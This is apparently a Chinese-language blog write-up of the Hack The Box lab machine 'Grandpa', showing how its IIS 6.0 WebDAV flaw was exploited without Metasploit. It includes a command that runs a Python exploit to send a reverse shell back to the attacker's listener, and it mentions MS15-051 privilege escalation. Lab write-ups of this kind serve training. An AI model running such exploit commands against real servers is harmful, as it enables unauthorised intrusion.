hackthebox-grandpa（考点：iis6.0）不用MSF

这靶机绝大部分人都是msf做的，毕竟适合这个靶机的漏洞文件没多少（还是中国人发现的呢），都是和msf相关，（而且用msf做也很不稳定，这靶机在论坛里也被吐槽），我好不容易找到个非msf的方法

nmap

从名字就可以看出。grandpa老爷爷和granny老奶奶这篇很像，没啥突破口，就是webdav信息多

故地重游
再来扫webdav
但是这次不一样了，都是fail

最后只能网上搜啊搜。。。搜到explodingcan ，也是用msf，我想把shellcode改成非msf。但改了也没效果
终于这个终于至少能拿低级别的shell

直接考下来。不用改，指令里加自己的ip和端口。不行的话，把靶机多重启几次

python iis.py 10.10.10.14 80 10.10.14.3 4444

收到，运行很慢，难怪这么多人吐槽此靶机。。

进去还是老套路，参考老奶奶那篇吧，用15-051,能收到shell但瞬间就断了。最后还是用的老奶奶那篇的提权exe。
收到。搞定。进去找txt,很卡，很慢。无语。。。。